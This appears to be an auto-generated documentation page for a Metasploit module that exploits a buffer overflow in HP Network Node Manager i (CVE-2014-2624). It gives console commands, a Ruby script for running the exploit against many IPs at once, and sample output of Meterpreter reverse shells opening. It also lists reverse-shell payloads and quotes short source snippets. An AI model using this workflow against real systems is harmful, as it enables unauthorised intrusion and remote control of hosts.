HP Network Node Manager I PMD Buffer Overflow - Metasploit


This page contains detailed information about how to use the exploit/linux/misc/hp_nnmi_pmd_bof metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: HP Network Node Manager I PMD Buffer Overflow
Module: exploit/linux/misc/hp_nnmi_pmd_bof
Source code: modules/exploits/linux/misc/hp_nnmi_pmd_bof.rb
Disclosure date: 2014-09-09
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): cmd
Supported platform(s): Unix
Target service / protocol: -
Target network port(s): 7426
List of CVEs: CVE-2014-2624

This module exploits a stack buffer overflow in HP Network Node Manager I (NNMi). The vulnerability exists in the pmd service, due to the insecure usage of functions like strcpy and strcat while handling stack_option packets with user controlled data. In order to bypass ASLR this module uses a proto_tbl packet to leak an libov pointer from the stack and finally build the ROP chain to avoid NX.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


Using hp_nnmi_pmd_bof against a single host

Normally, you can use exploit/linux/misc/hp_nnmi_pmd_bof this way:

msf > use exploit/linux/misc/hp_nnmi_pmd_bof
msf exploit(hp_nnmi_pmd_bof) > show targets
    ... a list of targets ...
msf exploit(hp_nnmi_pmd_bof) > set TARGET target-id
msf exploit(hp_nnmi_pmd_bof) > show options
    ... show and set options ...
msf exploit(hp_nnmi_pmd_bof) > exploit

Using hp_nnmi_pmd_bof against multiple hosts

But it looks like this is a remote exploit module, which means you can also engage multiple hosts.

First, create a list of IPs you wish to exploit with this module. One IP per line.

Second, set up a background payload listener. This payload should be the same as the one your hp_nnmi_pmd_bof will be using:

  1. Do: use exploit/multi/handler
  2. Do: set PAYLOAD [payload]
  3. Set other options required by the payload
  4. Do: set EXITONSESSION false
  5. Do: run -j

At this point, you should have a payload listening.

Next, create the following script. Notice you will probably need to modify the ip_list path, and payload options accordingly:

<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'

File.open(ip_list, 'rb').each_line do |ip|
  print_status("Trying against #{ip}")
  run_single("use exploit/linux/misc/hp_nnmi_pmd_bof")
  run_single("set RHOST #{ip}")
  run_single("set DisablePayloadHandler true")

  #
  # Set a payload that's the same as the handler.
  # You might also need to add more run_single commands to configure other
  # payload options.
  #
  run_single("set PAYLOAD [payload name]")

  run_single("run")
end
</ruby>

Next, run the resource script in the console:

msf > resource [path-to-resource-script]

And finally, you should see that the exploit is trying against those hosts similar to the following MS08-067 example:

msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80

RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199

[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600

[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Go back to menu.

Msfconsole Usage


Here is how the linux/misc/hp_nnmi_pmd_bof exploit module looks in the msfconsole:

msf6 > use exploit/linux/misc/hp_nnmi_pmd_bof

msf6 exploit(linux/misc/hp_nnmi_pmd_bof) > show info

       Name: HP Network Node Manager I PMD Buffer Overflow
     Module: exploit/linux/misc/hp_nnmi_pmd_bof
   Platform: Unix
       Arch: cmd
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2014-09-09

Provided by:
  d(-_-)b
  juan vazquez <[email protected]>

Available targets:
  Id  Name
  --  ----
  0   Automatic
  1   HP NNMi 9.10 / CentOS 5
  2   HP NNMi 9.20 / CentOS 6

Check supported:
  Yes

Basic options:
  Name    Current Setting  Required  Description
  ----    ---------------  --------  -----------
  RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT   7426             yes       The target port (UDP)

Payload information:
  Space: 3000
  Avoid: 1 characters

Description:
  This module exploits a stack buffer overflow in HP Network Node 
  Manager I (NNMi). The vulnerability exists in the pmd service, due 
  to the insecure usage of functions like strcpy and strcat while 
  handling stack_option packets with user controlled data. In order to 
  bypass ASLR this module uses a proto_tbl packet to leak an libov 
  pointer from the stack and finally build the ROP chain to avoid NX.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2014-2624
  http://www.zerodayinitiative.com/advisories/ZDI-14-305

Module Options


This is a complete list of options available in the linux/misc/hp_nnmi_pmd_bof exploit:

msf6 exploit(linux/misc/hp_nnmi_pmd_bof) > show options

Module options (exploit/linux/misc/hp_nnmi_pmd_bof):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   7426             yes       The target port (UDP)

Exploit target:

   Id  Name
   --  ----
   0   Automatic

Advanced Options


Here is a complete list of advanced options supported by the linux/misc/hp_nnmi_pmd_bof exploit:

msf6 exploit(linux/misc/hp_nnmi_pmd_bof) > show advanced

Module advanced options (exploit/linux/misc/hp_nnmi_pmd_bof):

   Name                    Current Setting  Required  Description
   ----                    ---------------  --------  -----------
   CHOST                                    no        The local client address
   CPORT                                    no        The local client port
   ContextInformationFile                   no        The information file that contains context information
   DisablePayloadHandler   false            no        Disable the handler code for the selected payload
   EnableContextEncoding   false            no        Use transient context when encoding payloads
   VERBOSE                 false            no        Enable detailed status messages
   WORKSPACE                                no        Specify the workspace for this module
   WfsDelay                2                no        Additional delay in seconds to wait for a session

Exploit Targets


Here is a list of targets (platforms and systems) which the linux/misc/hp_nnmi_pmd_bof module can exploit:

msf6 exploit(linux/misc/hp_nnmi_pmd_bof) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic
   1   HP NNMi 9.10 / CentOS 5
   2   HP NNMi 9.20 / CentOS 6

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the linux/misc/hp_nnmi_pmd_bof exploit:

msf6 exploit(linux/misc/hp_nnmi_pmd_bof) > show payloads

Compatible Payloads
===================

   #   Name                                 Disclosure Date  Rank    Check  Description
   -   ----                                 ---------------  ----    -----  -----------
   0   payload/cmd/unix/bind_awk                             normal  No     Unix Command Shell, Bind TCP (via AWK)
   1   payload/cmd/unix/bind_perl                            normal  No     Unix Command Shell, Bind TCP (via Perl)
   2   payload/cmd/unix/bind_perl_ipv6                       normal  No     Unix Command Shell, Bind TCP (via perl) IPv6
   3   payload/cmd/unix/generic                              normal  No     Unix Command, Generic Command Execution
   4   payload/cmd/unix/reverse_awk                          normal  No     Unix Command Shell, Reverse TCP (via AWK)
   5   payload/cmd/unix/reverse_bash                         normal  No     Unix Command Shell, Reverse TCP (/dev/tcp)
   6   payload/cmd/unix/reverse_openssl                      normal  No     Unix Command Shell, Double Reverse TCP SSL (openssl)
   7   payload/cmd/unix/reverse_perl                         normal  No     Unix Command Shell, Reverse TCP (via Perl)
   8   payload/cmd/unix/reverse_perl_ssl                     normal  No     Unix Command Shell, Reverse TCP SSL (via perl)
   9   payload/cmd/unix/reverse_python                       normal  No     Unix Command Shell, Reverse TCP (via Python)
   10  payload/cmd/unix/reverse_python_ssl                   normal  No     Unix Command Shell, Reverse TCP SSL (via python)

Evasion Options


Here is the full list of possible evasion options supported by the linux/misc/hp_nnmi_pmd_bof exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(linux/misc/hp_nnmi_pmd_bof) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Unable to get a 'proto_tbl' response...


Here is a relevant code snippet related to the "Unable to get a 'proto_tbl' response..." error message:

112:	      udp_sock.put(proto_tbl_pkt)
113:	      res = udp_sock.timed_read(13964)
114:	    end
115:	
116:	    if res.blank?
117:	      fail_with(Failure::Unknown, "Unable to get a 'proto_tbl' response...")
118:	    end
119:	
120:	    if target.name == 'Automatic'
121:	      print_status("Fingerprinting target...")
122:	      my_target = auto_target(res)

Unable to autodetect target...


Here is a relevant code snippet related to the "Unable to autodetect target..." error message:

118:	    end
119:	
120:	    if target.name == 'Automatic'
121:	      print_status("Fingerprinting target...")
122:	      my_target = auto_target(res)
123:	      fail_with(Failure::NoTarget, "Unable to autodetect target...") if my_target.nil?
124:	    else
125:	      my_target = target
126:	      fail_with(Failure::Unknown, "Unable to leak libov base address...") unless find_ov_base(my_target, res)
127:	    end
128:	

Unable to leak libov base address...


Here is a relevant code snippet related to the "Unable to leak libov base address..." error message:

121:	      print_status("Fingerprinting target...")
122:	      my_target = auto_target(res)
123:	      fail_with(Failure::NoTarget, "Unable to autodetect target...") if my_target.nil?
124:	    else
125:	      my_target = target
126:	      fail_with(Failure::Unknown, "Unable to leak libov base address...") unless find_ov_base(my_target, res)
127:	    end
128:	
129:	    print_good("Exploiting #{my_target.name} with libov base address at 0x#{@ov_base.to_s(16)}...")
130:	
131:	    # exploit with a "stack_option_pkt" packet

Go back to menu.


References


See Also


Check also the following modules related to this module:

Related Nessus plugins:

Authors


  • d(-_-)b
  • juan vazquez

Version


This page has been produced using Metasploit Framework version 6.2.26-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.